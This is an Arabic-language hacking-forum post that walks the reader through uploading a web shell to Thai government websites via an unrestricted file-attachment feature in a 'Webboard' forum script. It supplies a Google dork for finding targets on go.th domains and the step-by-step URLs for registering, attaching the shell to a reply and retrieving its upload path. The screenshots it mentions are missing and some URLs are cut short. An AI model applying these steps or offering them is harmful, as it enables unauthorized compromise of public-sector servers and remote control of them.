ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل

[Iraqe Hacker]

​السلام عليكم ورحمة الله وبركاته

ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل



اسم السكريبت المصاب: Webboard



Dork:




كود:
site:go.th inurl:name=member+file=index

نقوم بالتسجيل في المنتدى




كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index

بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:




كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard

نختار أحد المواضيع لنضيف الرد:






كود:
http://www.xxxxx.go.th/index.php?name=we...read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49

أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:






بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:











والرابط يكون مثل هذا:






كود:
http://www.xxxxx.go.th/webboard_upload/1...adspot.php

مبروك !